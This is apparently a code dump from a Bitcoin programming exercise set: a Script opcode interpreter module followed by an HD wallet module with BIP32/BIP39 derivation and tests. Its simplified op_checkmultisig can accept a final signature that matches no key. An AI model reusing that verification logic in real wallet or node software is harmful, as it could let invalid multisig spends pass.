if point.verify(z, sig):
stack.append(encode_num(1))
else:
stack.append(encode_num(0))
return True
def op_checksigverify(stack: List[bytes], z: int) -> bool:
return op_checksig(stack, z) and op_verify(stack)
def op_checkmultisig(stack: List[bytes], z: int) -> bool:
if len(stack) < 1:
return False
n = decode_num(stack.pop())
if len(stack) < n + 1:
return False
sec_pubkeys = []
for _ in range(n):
sec_pubkeys.append(stack.pop())
m = decode_num(stack.pop())
if len(stack) < m + 1:
return False
der_signatures = []
for _ in range(m):
# signature is assumed to be using SIGHASH_ALL
der_signatures.append(stack.pop()[:-1])
# OP_CHECKMULTISIG bug
stack.pop()
try:
# parse the sec pubkeys into an array of points
points = [S256Point.parse(sec) for sec in sec_pubkeys]
# parse the der_signatures into an array of signatures
sigs = [Signature(der) for der in der_signatures]
# loop through the signatures
for sig in sigs:
# bail early if we don't have any points left
if len(points) == 0:
print("signatures no good or not in right order")
return False
# while we have points
while points:
# get the point at the front (points.pop(0))
point = points.pop(0)
# see if this point can verify this sig with this z
if point.verify(z, sig):
# break if so, this sig is valid!
break
# if we made it this far, we have to add a 1 to the stack
# use encode_num(1)
stack.append(encode_num(1))
except (ValueError, SyntaxError):
return False
return True
def op_checkmultisigverify(stack: List[bytes], z: int) -> bool:
return op_checkmultisig(stack, z) and op_verify(stack)
def op_checklocktimeverify(stack: List[bytes], locktime: Locktime, sequence: Sequence) -> bool:
if sequence.is_max():
return False
if len(stack) < 1:
return False
element = decode_num(stack[-1])
if element < 0:
return False
stack_locktime = Locktime(element)
if not locktime.comparable(stack_locktime):
return False
if locktime.less_than(stack_locktime):
return False
return True
def op_checksequenceverify(stack: List[bytes], version: int, sequence: Sequence) -> bool:
if not sequence.relative():
return False
if len(stack) < 1:
return False
element = decode_num(stack[-1])
if element < 0:
return False
if version < 2:
return False
stack_sequence = Sequence(element)
if not sequence.comparable(stack_sequence):
return False
if sequence.less_than(stack_sequence):
return False
return True
OP_0 = b''
OP_PUSHDATA1 = bytes([76])
OP_PUSHDATA2 = bytes([77])
OP_PUSHDATA4 = bytes([78])
OP_1NEGATE = bytes([79])
OP_1 = bytes([81])
OP_2 = bytes([82])
OP_3 = bytes([83])
OP_4 = bytes([84])
OP_5 = bytes([85])
OP_6 = bytes([86])
OP_7 = bytes([87])
OP_8 = bytes([88])
OP_9 = bytes([89])
OP_10 = bytes([90])
OP_11 = bytes([91])
OP_12 = bytes([92])
OP_13 = bytes([93])
OP_14 = bytes([94])
OP_15 = bytes([95])
OP_16 = bytes([96])
OP_NOP = bytes([97])
OP_IF = bytes([99])
OP_NOTIF = bytes([100])
OP_ELSE = bytes([103])
OP_ENDIF = bytes([104])
OP_VERIFY = bytes([105])
OP_RETURN = bytes([106])
OP_TOALTSTACK = bytes([107])
OP_FROMALTSTACK = bytes([108])
OP_2DROP = bytes([109])
OP_2DUP = bytes([110])
OP_3DUP = bytes([111])
OP_2OVER = bytes([112])
OP_2ROT = bytes([113])
OP_2SWAP = bytes([114])
OP_IFDUP = bytes([115])
OP_DEPTH = bytes([116])
OP_DROP = bytes([117])
OP_DUP = bytes([118])
OP_NIP = bytes([119])
OP_OVER = bytes([120])
OP_PICK = bytes([121])
OP_ROLL = bytes([122])
OP_ROT = bytes([123])
OP_SWAP = bytes([124])
OP_TUCK = bytes([125])
OP_SIZE = bytes([130])
OP_EQUAL = bytes([135])
OP_EQUALVERIFY = bytes([136])
OP_1ADD = bytes([139])
OP_1SUB = bytes([140])
OP_NEGATE = bytes([143])
OP_ABS = bytes([144])
OP_NOT = bytes([145])
OP_0NOTEQUAL = bytes([146])
OP_ADD = bytes([147])
OP_SUB = bytes([148])
OP_BOOLAND = bytes([154])
OP_BOOLOR = bytes([155])
OP_NUMEQUAL = bytes([156])
OP_NUMEQUALVERIFY = bytes([157])
OP_NUMNOTEQUAL = bytes([158])
OP_LESSTHAN = bytes([159])
OP_GREATERTHAN = bytes([160])
OP_LESSTHANOREQUAL = bytes([161])
OP_GREATERTHANOREQUAL = bytes([162])
OP_MIN = bytes([163])
OP_MAX = bytes([164])
OP_WITHIN = bytes([165])
OP_RIPEMD160 = bytes([166])
OP_SHA1 = bytes([167])
OP_SHA256 = bytes([168])
OP_HASH160 = bytes([169])
OP_HASH256 = bytes([170])
OP_CHECKSIG = bytes([172])
OP_CHECKSIGVERIFY = bytes([173])
OP_CHECKMULTISIG = bytes([174])
OP_CHECKMULTISIGVERIFY = bytes([175])
OP_CHECKLOCKTIMEVERIFY = bytes([177])
OP_CHECKSEQUENCEVERIFY = bytes([178])
OP_CODE_TO_NUMBER = {
OP_0: 0,
OP_1NEGATE: -1,
OP_1: 1,
OP_2: 2,
OP_3: 3,
OP_4: 4,
OP_5: 5,
OP_6: 6,
OP_7: 7,
OP_8: 8,
OP_9: 9,
OP_10: 10,
OP_11: 11,
OP_12: 12,
OP_13: 13,
OP_14: 14,
OP_15: 15,
OP_16: 16,
}
NUMBER_TO_OP_CODE = {v: k for k, v in OP_CODE_TO_NUMBER.items()}
OP_CODE_FUNCTIONS = {
OP_0: op_0,
OP_1: op_1,
OP_2: op_2,
OP_3: op_3,
OP_4: op_4,
OP_5: op_5,
OP_6: op_6,
OP_7: op_7,
OP_8: op_8,
OP_9: op_9,
OP_10: op_10,
OP_11: op_11,
OP_12: op_12,
OP_13: op_13,
OP_14: op_14,
OP_15: op_15,
OP_16: op_16,
OP_CHECKLOCKTIMEVERIFY: op_checklocktimeverify,
OP_CHECKMULTISIG: op_checkmultisig,
OP_CHECKMULTISIGVERIFY: op_checkmultisigverify,
OP_CHECKSEQUENCEVERIFY: op_checksequenceverify,
OP_CHECKSIG: op_checksig,
OP_CHECKSIGVERIFY: op_checksigverify,
OP_DROP: op_drop,
OP_DUP: op_dup,
OP_EQUAL: op_equal,
OP_EQUALVERIFY: op_equalverify,
OP_FROMALTSTACK: op_fromaltstack,
OP_HASH160: op_hash160,
OP_IF: op_if,
OP_NOTIF: op_notif,
OP_TOALTSTACK: op_toaltstack,
OP_VERIFY: op_verify,
}
OP_CODE_NAMES = {
OP_0: 'OP_0',
OP_PUSHDATA1: 'OP_PUSHDATA1',
OP_PUSHDATA2: 'OP_PUSHDATA2',
OP_1NEGATE: 'OP_1NEGATE',
OP_1: 'OP_1',
OP_2: 'OP_2',
OP_3: 'OP_3',
OP_4: 'OP_4',
OP_5: 'OP_5',
OP_6: 'OP_6',
OP_7: 'OP_7',
OP_8: 'OP_8',
OP_9: 'OP_9',
OP_10: 'OP_10',
OP_11: 'OP_11',
OP_12: 'OP_12',
OP_13: 'OP_13',
OP_14: 'OP_14',
OP_15: 'OP_15',
OP_16: 'OP_16',
OP_NOP: 'OP_NOP',
OP_IF: 'OP_IF',
OP_NOTIF: 'OP_NOTIF',
OP_ELSE: 'OP_ELSE',
OP_ENDIF: 'OP_ENDIF',
OP_VERIFY: 'OP_VERIFY',
OP_RETURN: 'OP_RETURN',
OP_TOALTSTACK: 'OP_TOALTSTACK',
OP_FROMALTSTACK: 'OP_FROMALTSTACK',
OP_2DROP: 'OP_2DROP',
OP_2DUP: 'OP_2DUP',
OP_3DUP: 'OP_3DUP',
OP_2OVER: 'OP_2OVER',
OP_2ROT: 'OP_2ROT',
OP_2SWAP: 'OP_2SWAP',
OP_IFDUP: 'OP_IFDUP',
OP_DEPTH: 'OP_DEPTH',
OP_DROP: 'OP_DROP',
OP_DUP: 'OP_DUP',
OP_NIP: 'OP_NIP',
OP_OVER: 'OP_OVER',
OP_PICK: 'OP_PICK',
OP_ROLL: 'OP_ROLL',
OP_ROT: 'OP_ROT',
OP_SWAP: 'OP_SWAP',
OP_TUCK: 'OP_TUCK',
OP_SIZE: 'OP_SIZE',
OP_EQUAL: 'OP_EQUAL',
OP_EQUALVERIFY: 'OP_EQUALVERIFY',
OP_1ADD: 'OP_1ADD',
OP_1SUB: 'OP_1SUB',
OP_NEGATE: 'OP_NEGATE',
OP_ABS: 'OP_ABS',
OP_NOT: 'OP_NOT',
OP_0NOTEQUAL: 'OP_0NOTEQUAL',
OP_ADD: 'OP_ADD',
OP_SUB: 'OP_SUB',
OP_BOOLAND: 'OP_BOOLAND',
OP_BOOLOR: 'OP_BOOLOR',
OP_NUMEQUAL: 'OP_NUMEQUAL',
OP_NUMEQUALVERIFY: 'OP_NUMEQUALVERIFY',
OP_NUMNOTEQUAL: 'OP_NUMNOTEQUAL',
OP_LESSTHAN: 'OP_LESSTHAN',
OP_GREATERTHAN: 'OP_GREATERTHAN',
OP_LESSTHANOREQUAL: 'OP_LESSTHANOREQUAL',
OP_GREATERTHANOREQUAL: 'OP_GREATERTHANOREQUAL',
OP_MIN: 'OP_MIN',
OP_MAX: 'OP_MAX',
OP_WITHIN: 'OP_WITHIN',
OP_RIPEMD160: 'OP_RIPEMD160',
OP_SHA1: 'OP_SHA1',
OP_SHA256: 'OP_SHA256',
OP_HASH160: 'OP_HASH160',
OP_HASH256: 'OP_HASH256',
OP_CHECKSIG: 'OP_CHECKSIG',
OP_CHECKSIGVERIFY: 'OP_CHECKSIGVERIFY',
OP_CHECKMULTISIG: 'OP_CHECKMULTISIG',
OP_CHECKMULTISIGVERIFY: 'OP_CHECKMULTISIGVERIFY',
OP_CHECKLOCKTIMEVERIFY: 'OP_CHECKLOCKTIMEVERIFY',
OP_CHECKSEQUENCEVERIFY: 'OP_CHECKSEQUENCEVERIFY',
}
``` |
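A small sketch of driving the stack functions above by hand, assuming the `ecc` and `timelock` modules imported at the top of the file are available:

```python
from op import op_2, op_3, op_add, op_dup, op_equal, op_verify, decode_num

stack = []
op_2(stack)                    # stack: [b'\x02']
op_3(stack)                    # stack: [b'\x02', b'\x03']
op_add(stack)                  # pops 3 and 2, pushes encode_num(5)
print(decode_num(stack[-1]))   # 5

op_dup(stack)                  # duplicate the top element
op_equal(stack)                # 5 == 5, pushes encode_num(1)
print(op_verify(stack))        # True - consumes the 1
```

This mirrors how a script interpreter would dispatch through OP_CODE_FUNCTIONS, handing the shared stack to each op function and aborting on the first False return.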
{
"source": "jimmysong/pw-exercises",
"score": 2
} |
#### File: pw-exercises/session6/hd.py
```python
from io import BytesIO
from unittest import TestCase
from ecc import G, N, PrivateKey, S256Point
from helper import (
big_endian_to_int,
byte_to_int,
encode_base58_checksum,
hmac_sha512,
hmac_sha512_kdf,
int_to_big_endian,
int_to_byte,
raw_decode_base58,
sha256,
)
from mnemonic import secure_mnemonic, WORD_LOOKUP, WORD_LIST
MAINNET_XPRV = bytes.fromhex('0488ade4')
MAINNET_XPUB = bytes.fromhex('0488b21e')
MAINNET_YPRV = bytes.fromhex('049d7878')
MAINNET_YPUB = bytes.fromhex('049d7cb2')
MAINNET_ZPRV = bytes.fromhex('04b2430c')
MAINNET_ZPUB = bytes.fromhex('04b24746')
TESTNET_XPRV = bytes.fromhex('04358394')
TESTNET_XPUB = bytes.fromhex('043587cf')
TESTNET_YPRV = bytes.fromhex('044a4e28')
TESTNET_YPUB = bytes.fromhex('044a5262')
TESTNET_ZPRV = bytes.fromhex('045f18bc')
TESTNET_ZPUB = bytes.fromhex('045f1cf6')
class HDPrivateKey:
def __init__(self, private_key, chain_code,
depth=0, parent_fingerprint=b'\x00\x00\x00\x00',
child_number=0, testnet=False):
# the main secret, should be a PrivateKey object
self.private_key = private_key
self.private_key.testnet = testnet
# the code to make derivation deterministic
self.chain_code = chain_code
        # level the current key is at in the hierarchy
self.depth = depth
# fingerprint of the parent key
self.parent_fingerprint = parent_fingerprint
# what order child this is
self.child_number = child_number
self.testnet = testnet
# keep a copy of the corresponding public key
self.pub = HDPublicKey(
point=private_key.point,
chain_code=chain_code,
depth=depth,
parent_fingerprint=parent_fingerprint,
child_number=child_number,
testnet=testnet,
)
def wif(self):
return self.private_key.wif()
def sec(self):
return self.pub.sec()
def hash160(self):
return self.pub.hash160()
def p2pkh_script(self):
return self.pub.p2pkh_script()
def p2wpkh_script(self):
return self.pub.p2wpkh_script()
def p2sh_p2wpkh_script(self):
return self.pub.p2sh_p2wpkh_script()
def address(self):
return self.pub.address()
def bech32_address(self):
return self.pub.bech32_address()
def p2sh_p2wpkh_address(self):
return self.pub.p2sh_p2wpkh_address()
def __repr__(self):
return self.xprv()
@classmethod
def from_seed(cls, seed, testnet=False):
# get hmac_sha512 with b'Bitcoin seed' and seed
h = hmac_sha512(b'Bitcoin seed', seed)
# create the private key using the first 32 bytes in big endian
private_key = PrivateKey(secret=big_endian_to_int(h[:32]))
# chaincode is the last 32 bytes
chain_code = h[32:]
# return an instance of the class
return cls(
private_key=private_key,
chain_code=chain_code,
testnet=testnet,
)
def child(self, index):
'''Returns the child HDPrivateKey at a particular index.
        Hardened children are returned for indices >= 0x80000000.
'''
# if index >= 0x80000000
if index >= 0x80000000:
# the message data is the private key secret in 33 bytes in
# big-endian and the index in 4 bytes big-endian.
data = int_to_big_endian(self.private_key.secret, 33) + int_to_big_endian(index, 4)
else:
# the message data is the public key compressed SEC
# and the index in 4 bytes big-endian.
data = self.private_key.point.sec() + int_to_big_endian(index, 4)
# get the hmac_sha512 with chain code and data
h = hmac_sha512(self.chain_code, data)
# the new secret is the first 32 bytes as a big-endian integer
# plus the secret mod N
secret = (big_endian_to_int(h[:32]) + self.private_key.secret) % N
# create the PrivateKey object
private_key = PrivateKey(secret=secret)
# the chain code is the last 32 bytes
chain_code = h[32:]
# depth is whatever the current depth + 1
depth = self.depth + 1
# parent_fingerprint is the fingerprint of this node
parent_fingerprint = self.fingerprint()
# child number is the index
child_number = index
# return a new HDPrivateKey instance
return HDPrivateKey(
private_key=private_key,
chain_code=chain_code,
depth=depth,
parent_fingerprint=parent_fingerprint,
child_number=child_number,
testnet=self.testnet,
)
def traverse(self, path):
'''Returns the HDPrivateKey at the path indicated.
Path should be in the form of m/x/y/z where x' means
hardened'''
# keep track of the current node starting with self
current = self
# split up the path by the '/' splitter, ignore the first
components = path.split('/')[1:]
# iterate through the path components
for child in components:
# if the child ends with a ', we have a hardened child
if child.endswith("'"):
# index is the integer representation + 0x80000000
index = int(child[:-1]) + 0x80000000
# else the index is the integer representation
else:
index = int(child)
# grab the child at the index calculated
current = current.child(index)
# return the current child
return current
def raw_serialize(self, version):
# version + depth + parent_fingerprint + child number + chain code + private key
# start with version, which should be a constant depending on testnet
raw = version
# add depth, which is 1 byte using int_to_byte
raw += int_to_byte(self.depth)
# add the parent_fingerprint
raw += self.parent_fingerprint
# add the child number 4 bytes using int_to_big_endian
raw += int_to_big_endian(self.child_number, 4)
# add the chain code
raw += self.chain_code
# add the 0 byte and the private key's secret in big endian, 33 bytes
raw += int_to_big_endian(self.private_key.secret, 33)
return raw
def _prv(self, version):
'''Returns the base58-encoded x/y/z prv.
Expects a 4-byte version.'''
raw = self.raw_serialize(version)
# return the whole thing base58-encoded
return encode_base58_checksum(raw)
def xprv(self):
# from BIP0032:
if self.testnet:
version = TESTNET_XPRV
else:
version = MAINNET_XPRV
return self._prv(version)
def yprv(self):
# from BIP0049:
if self.testnet:
version = TESTNET_YPRV
else:
version = MAINNET_YPRV
return self._prv(version)
def zprv(self):
# from BIP0084:
if self.testnet:
version = TESTNET_ZPRV
else:
version = MAINNET_ZPRV
return self._prv(version)
# passthrough methods
def fingerprint(self):
return self.pub.fingerprint()
def xpub(self):
return self.pub.xpub()
def ypub(self):
return self.pub.ypub()
def zpub(self):
return self.pub.zpub()
@classmethod
def parse(cls, s):
'''Returns a HDPrivateKey from an extended key string'''
# get the bytes from the base58 using raw_decode_base58
raw = raw_decode_base58(s)
# check that the length of the raw is 78 bytes, otherwise raise ValueError
if len(raw) != 78:
raise ValueError('Not a proper extended key')
# create a stream
stream = BytesIO(raw)
# return the raw parsing of the stream
return cls.raw_parse(stream)
@classmethod
def raw_parse(cls, s):
'''Returns a HDPrivateKey from a stream'''
# first 4 bytes are the version
version = s.read(4)
# check that the version is one of the TESTNET or MAINNET
# private keys, if not raise a ValueError
if version in (TESTNET_XPRV, TESTNET_YPRV, TESTNET_ZPRV):
testnet = True
elif version in (MAINNET_XPRV, MAINNET_YPRV, MAINNET_ZPRV):
testnet = False
else:
raise ValueError('not an xprv, yprv or zprv: {}'.format(version))
# the next byte is depth
depth = byte_to_int(s.read(1))
# next 4 bytes are the parent_fingerprint
parent_fingerprint = s.read(4)
# next 4 bytes is the child number in big-endian
child_number = big_endian_to_int(s.read(4))
# next 32 bytes are the chain code
chain_code = s.read(32)
# the next byte should be b'\x00'
if byte_to_int(s.read(1)) != 0:
raise ValueError('private key should be preceded by a zero byte')
# last 32 bytes should be the private key in big endian
private_key = PrivateKey(secret=big_endian_to_int(s.read(32)))
# return an instance of the class
return cls(
private_key=private_key,
chain_code=chain_code,
depth=depth,
parent_fingerprint=parent_fingerprint,
child_number=child_number,
testnet=testnet,
)
def _get_address(self, purpose, account=0, external=True, address=0):
'''Returns the proper address among purposes 44', 49' and 84'.
p2pkh for 44', p2sh-p2wpkh for 49' and p2wpkh for 84'.'''
# if purpose is not one of 44', 49' or 84', raise ValueError
if purpose not in ("44'", "49'", "84'"):
raise ValueError('Cannot create an address without a proper purpose: {}'.format(purpose))
# if testnet, coin is 1', otherwise 0'
if self.testnet:
coin = "1'"
else:
coin = "0'"
# if external, chain is 0, otherwise 1
if external:
chain = '0'
else:
chain = '1'
# create the path m/purpose'/coin'/account'/chain/address
path = "m/{}/{}/{}'/{}/{}".format(purpose, coin, account, chain, address)
# get the HDPrivateKey at that location
hd_priv = self.traverse(path)
# if 44', return the address
if purpose == "44'":
return hd_priv.address()
# if 49', return the p2sh_p2wpkh_address
elif purpose == "49'":
return hd_priv.p2sh_p2wpkh_address()
# if 84', return the bech32_address
elif purpose == "84'":
return hd_priv.bech32_address()
def get_p2pkh_receiving_address(self, account=0, address=0):
return self._get_address("44'", account, True, address)
def get_p2pkh_change_address(self, account=0, address=0):
return self._get_address("44'", account, False, address)
def get_p2sh_p2wpkh_receiving_address(self, account=0, address=0):
return self._get_address("49'", account, True, address)
def get_p2sh_p2wpkh_change_address(self, account=0, address=0):
return self._get_address("49'", account, False, address)
def get_p2wpkh_receiving_address(self, account=0, address=0):
return self._get_address("84'", account, True, address)
def get_p2wpkh_change_address(self, account=0, address=0):
return self._get_address("84'", account, False, address)
@classmethod
def generate(cls, password=b'', entropy=0, testnet=False):
mnemonic = secure_mnemonic(entropy=entropy)
return mnemonic, cls.from_mnemonic(mnemonic, password=password, testnet=testnet)
@classmethod
def from_mnemonic(cls, mnemonic, password=b'', path='m', testnet=False):
'''Returns a HDPrivateKey object from the mnemonic.'''
# split the mnemonic into words with .split()
words = mnemonic.split()
# check that there are 12, 15, 18, 21 or 24 words
# if not, raise a ValueError
if len(words) not in (12, 15, 18, 21, 24):
raise ValueError('you need 12, 15, 18, 21, or 24 words')
# calculate the number
number = 0
# each word is 11 bits
for word in words:
# get the number that the word represents using WORD_LOOKUP
index = WORD_LOOKUP[word]
# left-shift the number by 11 bits and bitwise-or the index
number = (number << 11) | index
# checksum is the last n bits where n = (# of words / 3)
checksum_bits_length = len(words) // 3
# grab the checksum bits
checksum = number & ((1 << checksum_bits_length) - 1)
# get the actual number by right-shifting by the checksum bits length
data_num = number >> checksum_bits_length
# convert the number to big-endian
data = int_to_big_endian(data_num, checksum_bits_length * 4)
# the one byte we get is from sha256 of the data, shifted by
# 8 - the number of bits we need for the checksum
computed_checksum = sha256(data)[0] >> (8 - checksum_bits_length)
# check that the checksum is correct or raise ValueError
if checksum != computed_checksum:
raise ValueError('words fail checksum: {}'.format(words))
# normalize in case we got a mnemonic that's just the first 4 letters
normalized_words = []
for word in words:
normalized_words.append(WORD_LIST[WORD_LOOKUP[word]])
normalized_mnemonic = ' '.join(normalized_words)
# salt is b'mnemonic' + password
salt = b'mnemonic' + password
# the seed is the hmac_sha512_kdf with normalized mnemonic and salt
seed = hmac_sha512_kdf(normalized_mnemonic, salt)
# return the HDPrivateKey at the path specified
return cls.from_seed(seed, testnet=testnet).traverse(path)
class HDPublicKey:
def __init__(self, point, chain_code, depth, parent_fingerprint,
child_number, testnet=False):
self.point = point
self.chain_code = chain_code
self.depth = depth
self.parent_fingerprint = parent_fingerprint
self.child_number = child_number
self.testnet = testnet
self._raw = None
def __repr__(self):
return self.xpub()
def sec(self):
return self.point.sec()
def hash160(self):
return self.point.hash160()
def p2pkh_script(self):
return self.point.p2pkh_script()
def p2wpkh_script(self):
return self.point.p2wpkh_script()
def p2sh_p2wpkh_script(self):
return self.point.p2sh_p2wpkh_script()
def address(self):
return self.point.address(testnet=self.testnet)
def bech32_address(self):
return self.point.bech32_address(testnet=self.testnet)
def p2sh_p2wpkh_address(self):
return self.point.p2sh_p2wpkh_address(testnet=self.testnet)
def fingerprint(self):
'''Fingerprint is the hash160's first 4 bytes'''
return self.hash160()[:4]
def child(self, index):
        '''Returns the child HDPublicKey at a particular index.
        Raises ValueError for indices >= 0x80000000.
'''
# if index >= 0x80000000, raise a ValueError
if index >= 0x80000000:
raise ValueError('child number should always be less than 2^31')
# data is the SEC compressed and the index in 4 bytes big-endian
data = self.point.sec() + int_to_big_endian(index, 4)
# get hmac_sha512 with chain code, data
h = hmac_sha512(self.chain_code, data)
# the new public point is the current point +
# the first 32 bytes in big endian * G
point = self.point + big_endian_to_int(h[:32]) * G
# chain code is the last 32 bytes
chain_code = h[32:]
# depth is current depth + 1
depth = self.depth + 1
# parent_fingerprint is the fingerprint of this node
parent_fingerprint = self.fingerprint()
# child number is the index
child_number = index
# return the HDPublicKey instance
return HDPublicKey(
point=point,
chain_code=chain_code,
depth=depth,
parent_fingerprint=parent_fingerprint,
child_number=child_number,
testnet=self.testnet,
)
def traverse(self, path):
'''Returns the HDPublicKey at the path indicated.
Path should be in the form of m/x/y/z.'''
# start current node at self
current = self
# get components of the path split at '/', ignoring the first
components = path.split('/')[1:]
# iterate through the components
for child in components:
# raise a ValueError if the path ends with a '
if child[-1:] == "'":
raise ValueError('HDPublicKey cannot get hardened child')
# traverse the next child at the index
current = current.child(int(child))
# return the current node
return current
def raw_serialize(self):
if self._raw is None:
if self.testnet:
version = TESTNET_XPUB
else:
version = MAINNET_XPUB
self._raw = self._serialize(version)
return self._raw
def _serialize(self, version):
# start with the version
raw = version
# add the depth using int_to_byte
raw += int_to_byte(self.depth)
# add the parent_fingerprint
raw += self.parent_fingerprint
# add the child number in 4 bytes using int_to_big_endian
raw += int_to_big_endian(self.child_number, 4)
# add the chain code
raw += self.chain_code
# add the SEC pubkey
raw += self.point.sec()
return raw
def _pub(self, version):
'''Returns the base58-encoded x/y/z pub.
Expects a 4-byte version.'''
# get the serialization
raw = self._serialize(version)
# base58-encode the whole thing
return encode_base58_checksum(raw)
def xpub(self):
if self.testnet:
version = TESTNET_XPUB
else:
version = MAINNET_XPUB
return self._pub(version)
def ypub(self):
if self.testnet:
version = TESTNET_YPUB
else:
version = MAINNET_YPUB
return self._pub(version)
def zpub(self):
if self.testnet:
version = TESTNET_ZPUB
else:
version = MAINNET_ZPUB
return self._pub(version)
@classmethod
def parse(cls, s):
'''Returns a HDPublicKey from an extended key string'''
# get the bytes from the base58 using raw_decode_base58
raw = raw_decode_base58(s)
# check that the length of the raw is 78 bytes, otherwise raise ValueError
if len(raw) != 78:
raise ValueError('Not a proper extended key')
# create a stream
stream = BytesIO(raw)
# return the raw parsing of the stream
return cls.raw_parse(stream)
@classmethod
def raw_parse(cls, s):
'''Returns a HDPublicKey from a stream'''
# first 4 bytes are the version
version = s.read(4)
# check that the version is one of the TESTNET or MAINNET
# public keys, if not raise a ValueError
if version in (TESTNET_XPUB, TESTNET_YPUB, TESTNET_ZPUB):
testnet = True
elif version in (MAINNET_XPUB, MAINNET_YPUB, MAINNET_ZPUB):
testnet = False
else:
raise ValueError('not an xpub, ypub or zpub: {} {}'.format(s, version))
# the next byte is depth
depth = byte_to_int(s.read(1))
# next 4 bytes are the parent_fingerprint
parent_fingerprint = s.read(4)
# next 4 bytes is the child number in big-endian
child_number = big_endian_to_int(s.read(4))
# next 32 bytes are the chain code
chain_code = s.read(32)
# last 33 bytes should be the SEC
point = S256Point.parse(s.read(33))
# return an instance of the class
return cls(
point=point,
chain_code=chain_code,
depth=depth,
parent_fingerprint=parent_fingerprint,
child_number=child_number,
testnet=testnet,
)
class HDTest(TestCase):
def test_from_seed(self):
seed = b'<EMAIL> <NAME>'
priv = HDPrivateKey.from_seed(seed, testnet=True)
addr = priv.bech32_address()
self.assertEqual(addr, 'tb1q7kn55vf3mmd40gyj46r245lw87dc6us5n50lrg')
def test_child(self):
seed = b'<EMAIL> <NAME>'
priv = HDPrivateKey.from_seed(seed, testnet=True)
pub = priv.pub
want = 'tb1qu6mnnk54hxfhy4aj58v0w6e7q8hghtv8wcdl7g'
addr = priv.child(0).bech32_address()
self.assertEqual(addr, want)
addr = pub.child(0).bech32_address()
self.assertEqual(addr, want)
addr = priv.child(0x80000002).bech32_address()
self.assertEqual(addr, 'tb1qscu8evdlqsucj7p84xwnrf63h4jsdr5yqga8zq')
with self.assertRaises(ValueError):
pub.child(0x80000002)
def test_traverse(self):
seed = b'<EMAIL> <NAME>'
priv = HDPrivateKey.from_seed(seed, testnet=True)
pub = priv.pub
path = "m/1/2/3/4"
self.assertEqual(priv.traverse(path).bech32_address(), pub.traverse(path).bech32_address())
path = "m/0/1'/2/3'"
self.assertEqual(priv.traverse(path).bech32_address(), 'tb1q423gz8cenqt6vfw987vlyxql0rh2jgh4sy0tue')
def test_prv_pub(self):
tests = [
{
'seed': bytes.fromhex('000102030405060708090a0b0c0d0e0f'),
'paths': [
[
'm',
'<KEY>',
'<KEY>',
], [
'm/0\'',
'<KEY>',
'<KEY>',
], [
'm/0\'/1',
'<KEY>',
'<KEY>',
], [
'm/0\'/1/2\'',
'<KEY>',
'<KEY>',
], [
'm/0\'/1/2\'/2',
'<KEY>',
'<KEY>',
], [
'm/0\'/1/2\'/2/1000000000',
'<KEY>',
'<KEY>',
]
],
}, {
'seed': bytes.fromhex('fffcf9f6f3f0edeae7e4e1dedbd8d5d2cfccc9c6c3c0bdbab7b4b1aeaba8a5a29f9c999693908d8a8784817e7b7875726f6c696663605d5a5754514e4b484542'),
'paths': [
[
'm',
'<KEY>',
'<KEY>',
], [
'm/0',
'<KEY>',
'<KEY>',
], [
'm/0/2147483647\'',
'<KEY>',
'<KEY>',
], [
'm/0/2147483647\'/1',
'<KEY>',
'<KEY>',
], [
'm/0/2147483647\'/1/2147483646\'',
'<KEY>',
'<KEY>',
], [
'm/0/2147483647\'/1/2147483646\'/2',
'<KEY>',
'<KEY>',
],
],
}, {
'seed': bytes.fromhex('4b381541583be4423346c643850da4b320e46a87ae3d2a4e6da11eba819cd4acba45d239319ac14f863b8d5ab5a0d0c64d2e8a1e7d1457df2e5a3c51c73235be'),
'paths': [
[
'm',
'<KEY>',
'<KEY>',
], [
'm/0\'',
'<KEY>',
'<KEY>',
],
],
},
]
for test in tests:
seed = test['seed']
for path, xpub, xprv in test['paths']:
# test from seed
private_key = HDPrivateKey.from_seed(seed).traverse(path)
public_key = HDPublicKey.parse(xpub)
self.assertEqual(private_key.xprv(), xprv)
self.assertEqual(private_key.xpub(), public_key.xpub())
self.assertEqual(private_key.address(), public_key.address())
def test_parse(self):
xpub = '<KEY>'
hd_pub = HDPublicKey.parse(xpub)
self.assertEqual(hd_pub.xpub(), xpub)
xprv = '<KEY>'
hd_priv = HDPrivateKey.parse(xprv)
self.assertEqual(hd_priv.xprv(), xprv)
def test_get_address(self):
seedphrase = b'<EMAIL> <NAME>'
mainnet_priv = HDPrivateKey.from_seed(seedphrase)
testnet_priv = HDPrivateKey.from_seed(seedphrase, testnet=True)
tests = [
[mainnet_priv.get_p2pkh_receiving_address, 0, 1, '13pS51XfGTVhxbtrGKVSvwf36r96tLUu1K'],
[testnet_priv.get_p2pkh_change_address, 1, 0, 'n4EiCRsEEPaJ73HWA6zYEaHwo45BrP5MHb'],
[testnet_priv.get_p2sh_p2wpkh_receiving_address, 0, 2, '2NGKoo11UopXBWLC7qqj9BjgH9F3gvLdapz'],
[mainnet_priv.get_p2sh_p2wpkh_change_address, 0, 0, '38hYFPLMTykhURpCQTxkdDcpQKyieiYiU7'],
[mainnet_priv.get_p2wpkh_receiving_address, 2, 0, '<KEY>'],
[testnet_priv.get_p2wpkh_change_address, 1, 1, 'tb1qecjwdw5uwwdfezzntec7m4kc8zkyjcamlz7dv9'],
]
for function, account, address, want in tests:
got = function(account, address)
self.assertEqual(got, want)
def test_from_mnemonic(self):
tests = [
[
"00000000000000000000000000000000",
"abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon about",
"c55257c360c07c72029aebc1b53c05ed0362ada38ead3e3e9efa3708e53495531f09a6987599d18264c1e1c92f2cf141630c7a3c4ab7c81b2f001698e7463b04",
"<KEY>"
], [
"7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f7f",
"legal winner thank year wave sausage worth useful legal winner thank yellow",
"<KEY>",
"<KEY>"
], [
"80808080808080808080808080808080",
"letter advice cage absurd amount doctor acoustic avoid letter advice cage above",
"d71de856f81a8acc65e6fc851a38d4d7ec216fd0796d0a6827a3ad6ed5511a30fa280f12eb2e47ed2ac03b5c462a0358d18d69fe4f985ec81778c1b370b652a8",
"<KEY>"
], [
"ffffffffffffffffffffffffffffffff",
"zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo zoo wrong",
"ac27495480225222079d7be181583751e86f571027b0497b5b5d11218e0a8a13332572917f0f8e5a589620c6f15b11c61dee327651a14c34e18231052e48c069",
"<KEY>"
], [
"000000000000000000000000000000000000000000000000",
"abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon agent",
